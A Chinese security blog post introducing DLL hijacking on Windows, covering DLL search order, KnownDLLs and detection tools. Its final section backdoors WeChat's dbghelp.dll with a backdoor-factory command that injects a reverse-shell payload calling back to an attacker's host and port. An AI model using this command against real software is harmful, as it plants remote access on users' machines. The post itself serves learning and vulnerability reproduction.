懒羊羊

你看,那个人好像条狗欸

  • HOME
  • TIMELINE
  • TO DO
POST MYTHOUGHT ABOUT
    本站访客数8586人次

懒羊羊

你看,那个人好像条狗欸

  • HOME
  • TIMELINE
  • TO DO

dll 劫持初识


本文已被阅读: 73次    2019-07-25

Windows加载器将可执行模块映射到进程的地址空间中,加载器分析可执行模块的输入表,并设法找出任何需要的DLL,并将它们映射到进程的地址空间中。由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索DLL文件。通常可以利用搜索顺序的特点,伪造同名的dll

搜索dll文件的路径顺序

在 windows XP SP2 之前

  • 程序所在目录
  • 当前目录
  • 系统目录
  • 16位系统目录
  • windows目录
  • path环境变量中的各个目录

在windows XP SP2 之后

windows 查找DLL和对应的顺序(SafeDllSearchMode默认被开启):
注册表HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode 其键值为1时,dll寻路顺序如下:

  • 程序所在目录
  • 系统目录 SYSTEM32目录
  • 16位系统目录 SYSTEM目录
  • windows目录
  • 当前目录
  • path环境变量中的各个目录

之后的系统版本
SafeDllSearchMode 取消了,采用KnowDlls 在该项下的dll跳过正在寻找路径顺序,从其系统目录调用,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs

win 10

win server 2003

win server 2012

win xp

漏洞检测

1、使用process Explorer检查应用程序主要调用的dll
2、使用dll劫持神器
3、使用rattler dll 检查工具

微信 dll劫持

根据劫持的原理,选择程序路径下dll文件就行,这里使用dbghelp.dll,将dbghelp.dll复制到攻击机中backdoor-factory中。使用命令python backdoor -f dgbhelp.dll -s reverse_shell_tcp_inline -P <端口> -H <url>

反弹shell成功

Reference

https://www.cnblogs.com/backlion/p/7472021.html

  • 漏洞复现

扫一扫,分享到微信

微信分享二维码
i春秋线下三层靶场(writeup)
IPC$ 共享命名管道
  1. 1. 搜索dll文件的路径顺序
  2. 2. 漏洞检测
  3. 3. 微信 dll劫持
  4. 4. Reference

Related Issues not found

Please contact @geekforfree to initialize the comment

© 2019 懒羊羊
Hexo Theme Yilia by Litten
  • POST
  • MYTHOUGHT
  • ABOUT

tag:

  • HTTP
  • = 共享管道
  • web
  • json
  • token
  • ettercap
  • dns 欺骗
  • RCE
  • 代码审计
  • discuz ml
  • 漏洞复现
  • dns
  • 注入
  • hexo
  • blog
  • 源码泄露
  • ssh爆破
  • sudo 权限
  • newbugku
  • nmap
  • 魔术方法
  • 反序列化
  • 环境搭建
  • 代码调试
  • 沙箱逃逸
  • 利用
  • linux
  • os
  • 预编译
  • 存储过程
  • typecho
  • 域环境
  • talking shit freestyle
  • 序列化
  • 指纹识别
  • 子域名挖掘
  • 敏感目录
  • 端口查询

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置:

      jsonContent:
        meta: false
        pages: false
        posts:
          title: true
          date: true
          path: true
          text: false
          raw: false
          content: false
          slug: false
          updated: false
          comments: false
          link: false
          permalink: false
          excerpt: false
          categories: false
          tags: true
    

  • .user.ini后门

    2019-12-04

  • SOAP 相关安全知识

    2019-12-04

  • php 反序列化漏洞总结

    2019-12-04

    #反序列化

  • redis 漏洞总结

    2019-12-04

    #利用

  • 离职感想

    2019-12-03

    #talking shit freestyle

  • dnslog 盲注总结

    2019-11-26

    #dns#注入

  • sql语句预编译和存储过程

    2019-11-26

    #预编译#存储过程

  • python 沙箱逃逸-学习笔记

    2019-10-20

    #沙箱逃逸

  • billu_b0x_wp

    2019-07-29

  • breach1.0_wp

    2019-07-29

  • lazyAdmin_wp

    2019-07-29

    #ssh爆破#sudo 权限

  • i春秋线下三层靶场(writeup)

    2019-07-24

  • dll 劫持初识

    2019-07-24

    #漏洞复现

  • IPC$ 共享命名管道

    2019-07-24

    #= 共享管道

  • discuz ml 任意代码执行

    2019-07-17

    #RCE#代码审计#discuz ml

  • java 序列化与反序列化 初识

    2019-07-01

    #反序列化#序列化

  • JSON WEB TOKEN 初识

    2019-06-30

    #web#json#token

  • newbugku_ctf 论剑场 web writeup (持续更新)

    2019-06-30

    #web#newbugku

  • git源码泄露

    2019-06-30

    #源码泄露

  • phpstorm + debug 的php调试

    2019-06-30

    #环境搭建#代码调试

  • 信息收集 (持续更新)

    2019-06-30

    #指纹识别#子域名挖掘#敏感目录#端口查询

  • php 十六种常见魔术方法

    2019-05-26

    #代码审计#魔术方法

  • browser_autopwn2 + ettercapdns 组合拳

    2019-05-26

    #ettercap#dns 欺骗

  • typecho 反序列化漏洞

    2019-05-26

    #代码审计#反序列化#typecho

  • sqli-lab (一) less 1 — 10

    2019-04-13

  • 域环境

    2019-04-11

    #域环境

  • nmap 使用教程(一)

    2019-04-09

    #nmap

  • Http 1.0 与 1.1 的区别

    2019-04-09

    #HTTP

  • shell编程(一)

    2019-04-01

    #linux#os

  • github个人博客的搭建+hexo主题

    2019-03-17

    #hexo#blog

很想当一名

hacker

的懒羊羊